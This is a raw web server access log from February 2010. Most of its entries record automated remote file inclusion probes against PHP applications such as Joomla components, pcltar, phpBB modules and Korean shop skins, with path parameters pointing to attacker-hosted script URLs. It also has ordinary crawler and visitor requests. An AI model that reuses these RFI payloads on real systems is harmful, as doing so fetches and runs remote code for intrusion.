202.167.221.65 - - [23/Feb/2010:01:18:45 -0500] "GET /logs/error_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:18:53 -0500] "GET /logs/access_log.Q109101800%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:18:53 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:18:53 -0500] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:18:53 -0500] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:18:53 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:19:11 -0500] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:19:11 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:19:11 -0500] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:19:11 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:19:14 -0500] "GET /logs/access_log.Q109063000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:19:26 -0500] "GET /logs/access_log.Q109102200//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:19:30 -0500] "GET /logs/access_log.Q109080400////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:19:30 -0500] "GET /logs/access_log.Q109071000//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.59.104.8 - - [23/Feb/2010:01:19:33 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:19:33 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.93.147.154 - - [23/Feb/2010:01:19:37 -0500] "GET /logs/error_log.Q109100600%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.59.104.8 - - [23/Feb/2010:01:19:40 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:19:40 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.254.98.142 - - [23/Feb/2010:01:19:44 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:19:44 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
211.59.104.8 - - [23/Feb/2010:01:19:46 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:19:46 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:19:50 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:19:50 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.15.152.132 - - [23/Feb/2010:01:19:54 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:19:55 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:01:19:55 -0500] "GET /logs//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:01:19:55 -0500] "GET //2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:19:56 -0500] "GET /logs/access_log.Q110021100%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:01:19:56 -0500] "GET /logs/access_log.Q110021000%20%20//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:19:57 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:19:58 -0500] "GET /logs/access_log.Q110021100%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:19:58 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:20:18 -0500] "GET /logs/error_log.Q110021100%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:20:22 -0500] "GET /logs/access_log.Q109101600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.181.7.57 - - [23/Feb/2010:01:20:22 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.15.152.132 - - [23/Feb/2010:01:20:24 -0500] "GET /logs/error_log.Q110021100%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.125.66.91 - - [23/Feb/2010:01:20:47 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.231.60.116 - - [23/Feb/2010:01:20:48 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:20:48 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:20:48 -0500] "GET /logs/access_log.Q109052700%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:21:04 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:21:04 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:21:04 -0500] "GET /logs/access_log.Q109052700%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:21:24 -0500] "GET /logs/access_log.Q109121300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:21:32 -0500] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:21:32 -0500] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:21:32 -0500] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.231.60.116 - - [23/Feb/2010:01:21:40 -0500] "GET /logs/access_log.Q109121300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.beadsgallery.co.kr/Hobby/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.59.104.8 - - [23/Feb/2010:01:21:49 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:21:49 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:21:50 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.59.104.8 - - [23/Feb/2010:01:21:50 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.93.147.154 - - [23/Feb/2010:01:21:54 -0500] "GET /logs/access_log.Q109101800%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:22:05 -0500] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.183.19 - - [23/Feb/2010:01:22:06 -0500] "GET //2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.106.183.19 - - [23/Feb/2010:01:22:10 -0500] "GET /logs//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.106.183.19 - - [23/Feb/2010:01:22:10 -0500] "GET /logs/access_log.Q110021000%20%20//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:01:22:29 -0500] "GET /logs/access_log.Q109062700%20%20//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:22:41 -0500] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:22:41 -0500] "GET /logs/error_log.Q109100600%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:22:43 -0500] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:22:43 -0500] "GET /logs/error_log.Q109091000%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:22:51 -0500] "GET /logs/access_log.Q109091000//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:22:53 -0500] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:22:54 -0500] "GET /logs/access_log.Q109063000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:23:07 -0500] "GET /logs/access_log.Q109070400//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:23:07 -0500] "GET /logs/access_log.Q109101600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:23:19 -0500] "GET /logs/access_log.Q109101800//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:23:23 -0500] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:23:37 -0500] "GET /logs/access_log.Q109082900%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:23:43 -0500] "GET /logs/access_log.Q109101600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:24:05 -0500] "GET /logs/error_log.Q109062500%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:24:18 -0500] "GET /logs/access_log.Q109062500%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:01:24:27 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.141.1.113 - - [23/Feb/2010:01:24:31 -0500] "GET /logs//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:31 -0500] "GET /logs/access_log.Q110021000//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:31 -0500] "GET //2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:24:32 -0500] "GET /logs/access_log.Q109052000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:39 -0500] "GET //2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:39 -0500] "GET /logs/access_log.Q110021000//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:39 -0500] "GET /logs//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:47 -0500] "GET /logs/access_log.Q109062700//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.106.183.19 - - [23/Feb/2010:01:24:56 -0500] "GET /logs/access_log.Q109062700%20%20//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/12/2722069//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:01:24:57 -0500] "GET /logs/access_log.Q109062700//2008/gmte//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:25:06 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:25:08 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.249.71.219 - - [23/Feb/2010:01:25:11 -0500] "GET /images/509600_full.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
211.108.61.176 - - [23/Feb/2010:01:25:51 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ur%20url%20spread??? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:01:25:51 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ur%20url%20spread??? HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:01:25:52 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.108.61.176 - - [23/Feb/2010:01:25:52 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.115.68.54 - - [23/Feb/2010:01:26:05 -0500] "GET /logs/access_log.Q109071400%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:10 -0500] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:10 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:10 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:26:21 -0500] "GET /logs/access_log.Q109060300%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:26:25 -0500] "GET /logs/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:26:28 -0500] "GET /logs/access_log.Q109122200/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:26:28 -0500] "GET /logs/access_log.Q109090300/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:26:33 -0500] "GET /index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:35 -0500] "GET /logs/error_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:26:37 -0500] "GET /logs/access_log.Q109062400%20%20///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:26:37 -0500] "GET ///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:26:37 -0500] "GET /logs///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:38 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:38 -0500] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:39 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:01:26:43 -0500] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:01:26:56 -0500] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
